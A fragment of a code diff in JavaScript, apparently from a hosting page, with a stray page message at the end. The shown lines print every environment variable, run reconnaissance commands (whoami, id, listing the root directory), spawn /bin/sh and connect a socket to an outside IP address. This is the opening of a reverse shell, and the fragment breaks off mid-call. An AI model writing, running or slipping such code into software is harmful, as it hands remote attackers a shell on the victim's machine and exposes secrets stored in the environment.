@@ -10,10 +10,6 @@ function run(command) {
console.log("Env:");
console.log(process.env);
run("whoami");
run("id -a");
run("ls /");
const sh = child_process.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6677, "152.136.32.206", function () {
The note is not visible to the blocked user.